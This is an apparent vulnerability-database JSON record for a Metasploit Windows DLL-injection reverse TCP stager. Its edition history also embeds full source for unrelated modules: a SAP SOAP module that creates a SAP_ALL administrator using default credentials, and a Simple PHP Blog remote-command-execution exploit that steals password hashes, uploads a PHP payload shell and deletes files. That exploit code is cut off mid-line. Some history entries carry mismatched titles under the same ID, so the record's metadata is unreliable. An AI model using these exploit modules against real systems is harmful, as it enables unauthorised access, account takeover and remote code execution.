ID MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
Inject a custom DLL into the exploited process. Connect back to the attacker
# -*- coding: binary -*-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/reverse_tcp_rc4_dns'
module MetasploitModule
CachedSize = 425
include Msf::Payload::Stager
include Msf::Payload::Windows::ReverseTcpRc4Dns
def self.handler_type_alias
"reverse_tcp_rc4_dns"
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',
'Description' => 'Connect back to the attacker',
'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Convention' => 'sockedi',
'Stager' =>
{ 'RequiresMidstager' => false }
))
end
end
{"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-22T07:32:45", "history": [{"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/payload/windows/patchupdllinject/reverse_tcp_rc4_dns", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:50:14", "history": [], "viewCount": 8, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": ""}, "lastseen": "2017-07-02T23:50:14", "differentElements": ["href"], "edition": 1}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "591b03e69bf49b22b606bff855740cb7", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:28", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6FA476CE00BC8482F43AF2BD9937FB32"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:88D0E22AEC73763DA2CFC04B17A18815", "CARBONBLACK:B027EA436203BDA814C4EA51081F6A87", "CARBONBLACK:89E99C6BF8DD5C2DDE08ED61C12701BF"]}, {"type": "kitploit", "idList": ["KITPLOIT:4252843133018759751", "KITPLOIT:9165290622393060450", "KITPLOIT:5834604300745056017", "KITPLOIT:7455761002232864942"]}, {"type": "exploitdb", "idList": ["EDB-ID:46335", "EDB-ID:46334", "EDB-ID:46345", "EDB-ID:46342", "EDB-ID:46343", "EDB-ID:46338", "EDB-ID:46346"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891666", "OPENVAS:1361412562310107544", "OPENVAS:1361412562310107540", "OPENVAS:1361412562310107541"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1666-1:43CD3"]}], "modified": "2017-08-21T15:32:28"}}, "objectVersion": "1.4", "sourceHref": "", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": ""}, "lastseen": "2017-08-21T15:32:28", "differentElements": ["description", "metasploitReliability", "modified", "published", "sourceData", "sourceHref"], "edition": 2}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-28T21:14:38", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32807", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293", "MYHACK58:62201994275", "MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:770767703878928446", "KITPLOIT:4058383618754638390"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}], "modified": "2019-05-28T21:14:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T21:14:38", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 3}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "d6763ca1c5b1001f04abb43ab7497ec3", "type": "metasploit", "bulletinFamily": "exploit", "title": "SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation", "description": "This module makes use of the SUSR_RFC_USER_INTERFACE function, through the SOAP /sap/bc/soap/rfc service, for creating/modifying users on a SAP.\n", "published": "2012-11-07T16:04:07", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"], "cvelist": [], "lastseen": "2019-06-07T18:44:20", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32807", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293", "MYHACK58:62201994275", "MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:770767703878928446", "KITPLOIT:4058383618754638390"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}], "modified": "2019-05-28T21:14:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This module is based on, inspired by, or is a port of a plugin available in\n# the Onapsis Bizploit Opensource ERP Penetration Testing framework -\n# http://www.onapsis.com/research-free-solutions.php.\n# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts\n# in producing the Metasploit modules and was happy to share his knowledge and\n# experience - a very cool guy. I'd also like to thank Chris John Riley,\n# Ian de Villiers and Joris van de Vis who have Beta tested the modules and\n# provided excellent feedback. Some people just seem to enjoy hacking SAP :)\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation',\n 'Description' => %q{\n This module makes use of the SUSR_RFC_USER_INTERFACE function, through the SOAP\n /sap/bc/soap/rfc service, for creating/modifying users on a SAP.\n },\n 'References' =>\n [\n [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]\n ],\n 'Author' =>\n [\n 'Agnivesh Sathasivam',\n 'nmonkee'\n ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n Opt::RPORT(8000),\n OptString.new('CLIENT', [true, 'SAP client', '001']),\n OptString.new('HttpUsername', [true, 'Username', 'SAP*']),\n OptString.new('HttpPassword', [true, 'Password', '06071992']),\n OptString.new('ABAP_PASSWORD',[false,'Password for the account (Default is msf1234)','msf1234']),\n OptString.new('ABAP_USER',[false,'Username for the account (Username in upper case only. Default is MSF)', 'MSF'])\n ])\n end\n\n def run_host(ip)\n data = '<?xml version=\"1.0\" encoding=\"utf-8\" ?>'\n data << '<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\n data << '<env:Body>'\n data << '<n1:SUSR_RFC_USER_INTERFACE xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">'\n data << '<ACTIVITY>01</ACTIVITY>'\n data << '<PASSWORD>' + datastore['ABAP_PASSWORD'] + '</PASSWORD>'\n data << '<USER>' + datastore['ABAP_USER'] + '</USER>'\n data << '<USER_PROFILES>'\n data << '<item>'\n data << '<PROFN>SAP_ALL</PROFN>'\n data << '</item>'\n data << '</USER_PROFILES>'\n data << '</n1:SUSR_RFC_USER_INTERFACE>'\n data << '</env:Body>'\n data << '</env:Envelope>'\n\n begin\n vprint_status(\"[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'\")\n res = send_request_cgi({\n 'uri' => '/sap/bc/soap/rfc',\n 'method' => 'POST',\n 'data' => data,\n 'cookie' => \"sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}\",\n 'ctype' => 'text/xml; charset=UTF-8',\n 'encode_params' => false,\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'headers' => {\n 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'\n },\n 'vars_get' => {\n 'sap-client' => datastore['CLIENT'],\n 'sap-language' => 'EN'\n }\n })\n if res and res.code == 200\n if res.body =~ /<h1>Logon failed<\\/h1>/\n vprint_error(\"[SAP] #{ip}:#{rport} - Logon failed\")\n return\n elsif res.body =~ /faultstring/\n error = []\n error = [ res.body.scan(%r{(.*?)}) ]\n vprint_error(\"[SAP] #{ip}:#{rport} - #{error.join.chomp}\")\n return\n else\n print_good(\"[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created\")\n return\n end\n elsif res and res.code == 500 and res.body =~ /USER_ALLREADY_EXISTS/\n vprint_error(\"[SAP] #{ip}:#{rport} - user already exists\")\n return\n else\n vprint_error(\"[SAP] #{ip}:#{rport} - Unknown error\")\n vprint_error(\"[SAP] #{ip}:#{rport} - Error code: \" + res.code) if res\n vprint_error(\"[SAP] #{ip}:#{rport} - Error message: \" + res.message) if res\n return\n end\n rescue ::Rex::ConnectionError\n vprint_error(\"[SAP] #{rhost}:#{rport} - Unable to connect\")\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-07T18:44:20", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 4}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-07T20:45:51", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32807", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293", "MYHACK58:62201994275", "MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:770767703878928446", "KITPLOIT:4058383618754638390"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}], "modified": "2019-05-28T21:14:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-07T20:45:51", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "78caf39dddc658ef63d26b455b63b5b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-09T17:03:03", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32807", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293", "MYHACK58:62201994275", "MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:770767703878928446", "KITPLOIT:4058383618754638390"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}], "modified": "2019-05-28T21:14:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-09T17:03:03", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-09T21:00:25", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-06-09T21:00:25"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:3C0E73E1C38071923188099A40931C49", "THREATPOST:997BDAF6F56D4542DDD5DDA9729D190F", "THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:44B28AC1712980363351C878C13C345F"]}, {"type": "securelist", "idList": ["SECURELIST:DF2707C91EBB08659B3D16664DEEC69A"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E", "THN:C9C46E3C63DA812F6C22E297AB5F14C3"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "exploitdb", "idList": ["EDB-ID:46980"]}, {"type": "symantec", "idList": ["SMNTC-108588", "SMNTC-108631", "SMNTC-108577", "SMNTC-108646", "SMNTC-108603", "SMNTC-108584", "SMNTC-108641", "SMNTC-108654"]}], "modified": "2019-06-09T21:00:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-09T21:00:25", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 7}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "0a885c9ebfc50d8b9903879e1b8b987a", "type": "metasploit", "bulletinFamily": "exploit", "title": "Simple PHP Blog Remote Command Execution", "description": "This module combines three separate issues within The Simple PHP Blog (<= 0.4.0) application to upload arbitrary data and thus execute a shell. The first vulnerability exposes the hash file (password.txt) to unauthenticated users. The second vulnerability lies within the image upload system provided to logged-in users; there is no image validation function in the blogger to prevent an authenticated user from uploading any file type. The third vulnerability occurs within the blog comment functionality, allowing arbitrary files to be deleted.\n", "published": "2008-10-19T21:03:39", "modified": "2017-11-08T16:00:24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2733"], "cvelist": ["CVE-2005-2733"], "lastseen": "2019-06-27T10:42:29", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-06-09T21:00:25"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:3C0E73E1C38071923188099A40931C49", "THREATPOST:997BDAF6F56D4542DDD5DDA9729D190F", "THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:44B28AC1712980363351C878C13C345F"]}, {"type": "securelist", "idList": ["SECURELIST:DF2707C91EBB08659B3D16664DEEC69A"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E", "THN:C9C46E3C63DA812F6C22E297AB5F14C3"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "exploitdb", "idList": ["EDB-ID:46980"]}, {"type": "symantec", "idList": ["SMNTC-108588", "SMNTC-108631", "SMNTC-108577", "SMNTC-108646", "SMNTC-108603", "SMNTC-108584", "SMNTC-108641", "SMNTC-108654"]}], "modified": "2019-06-09T21:00:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/sphpblog_file_upload.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Simple PHP Blog Remote Command Execution',\n 'Description' => %q{\n This module combines three separate issues within The Simple PHP Blog (<= 0.4.0)\n application to upload arbitrary data and thus execute a shell. The first\n vulnerability exposes the hash file (password.txt) to unauthenticated users.\n The second vulnerability lies within the image upload system provided to\n logged-in users; there is no image validation function in the blogger to\n prevent an authenticated user from uploading any file type. The third\n vulnerability occurs within the blog comment functionality, allowing\n arbitrary files to be deleted.\n },\n 'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2005-2733'],\n ['OSVDB', '19012'],\n ['BID', '14667'],\n ['EDB', '1191'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'ConnectionType' => 'find',\n },\n },\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => 'Aug 25 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"Sphpblog directory path\", \"/sphpblog\"]),\n ])\n end\n\n def check\n res = send_request_raw({\n 'uri' => normalize_uri(datastore['URI'], '/index.php')\n }, 25)\n\n if (res and res.body =~ /Simple PHP Blog (\\d)\\.(\\d)\\.(\\d)/)\n\n ver = [ $1.to_i, $2.to_i, $3.to_i ]\n vprint_status(\"Simple PHP Blog #{ver.join('.')}\")\n\n if (ver[0] == 0 and ver[1] < 5)\n if (ver[1] == 4 and ver[2] > 0)\n return Exploit::CheckCode::Safe\n end\n return Exploit::CheckCode::Appears\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def retrieve_password_hash(file)\n\n res = send_request_raw({\n 'uri' => normalize_uri(datastore['URI'], file)\n }, 25)\n\n if (res and res.message == \"OK\" and res.body)\n print_good(\"Successfully retrieved hash: #{res.body}\")\n return res.body\n else\n fail_with(Failure::NotVulnerable, \"Failed to retrieve hash, server may not be vulnerable.\")\n return false\n end\n end\n\n def create_new_password(user, pass)\n\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI'], '/install03_cgi.php'),\n 'method' => 'POST',\n 'data' => \"user=#{user}&pass=#{pass}\",\n }, 25)\n\n if (res)\n print_good(\"Successfully created temporary account.\")\n else\n print_error(\"Unable to create a temporary account!\")\n end\n end\n\n def retrieve_session(user, pass)\n\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI'], \"/login_cgi.php\"),\n 'method' => 'POST',\n 'data' => \"user=#{user}&pass=#{pass}\",\n }, 25)\n\n if res\n print_good(\"Successfully logged in as #{user}:#{pass}\")\n\n if res.get_cookies =~ /my_id=(.*)/\n session = $1\n print_good(\"Successfully retrieved cookie: #{session}\")\n return session\n else\n print_error(\"Error retrieving cookie!\")\n end\n else\n print_error(\"No response received while logging in.\")\n end\n end\n\n def upload_page(session, dir, newpage, contents)\n\n boundary = rand_text_alphanumeric(6)\n\n data = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"userfile\\\"; \"\n data << \"filename=\\\"#{newpage}\\\"\\r\\nContent-Type: text/plain\\r\\n\\r\\n\"\n data << contents\n data << \"\\r\\n--#{boundary}--\"\n\n res = send_request_raw({\n 'uri'\t => normalize_uri(datastore['URI'], \"/upload_img_cgi.php\"),\n 'method' => 'POST',\n 'data' => data,\n 'headers' =>\n {\n 'Content-Type'\t => 'multipart/form-data; boundary=' + boundary,\n 'Content-Length' => data.length,\n 'Cookie'\t => \"my_id=#{session}; PHPSESSID=#{session}\",\n }\n }, 25)\n\n if (res)\n print_good(\"Successfully Uploaded #{newpage}\")\n else\n print_error(\"Error uploading #{newpage}\")\n end\n end\n\n def reset_original_password(hash, scriptlocation)\n\n res = send_request_cgi({\n 'uri'\t => normalize_uri(datastore['URI'], scriptlocation),\n 'method' => 'POST',\n 'data'\t => \"hash=\" + hash,\n }, 25)\n\n if (res)\n print_good(\"Successfully reset original password hash.\")\n else\n print_error(\"Error resetting original password!\")\n end\n end\n\n def delete_file(file)\n\n delete_path = \"/comment_delete_cgi.php?y=05&m=08&comment=.#{file}\"\n\n res = send_request_raw({\n 'uri'\t=> normalize_uri(datastore['URI'], delete_path),\n }, 25)\n\n if (res)\n print_good(\"Successfully removed #{file}\")\n else\n print_error(\"Error removing #{file}!\")\n end\n end\n\n def cmd_shell(cmdpath)\n print_status(\"Calling payload: #{cmdpath}\")\n\n res = send_request_raw({\n 'uri'\t=> datastore['URI'] + cmdpath\n }, 25)\n\n end\n\n def exploit\n\n # Define the scripts to be uploaded to aid in exploitation\n cmd_php = '<?php ' + payload.encoded + '?>'\n\n reset_php = %Q|\n <?php $hash = $_POST['hash'];\n $fp = fopen(\"../config/password.txt\",\"w\");\n fwrite($fp,$hash);\n fpclose($fp);\n ?>|\n\n # Generate some random strings\n cmdscript\t= rand_text_alphanumeric(20) + 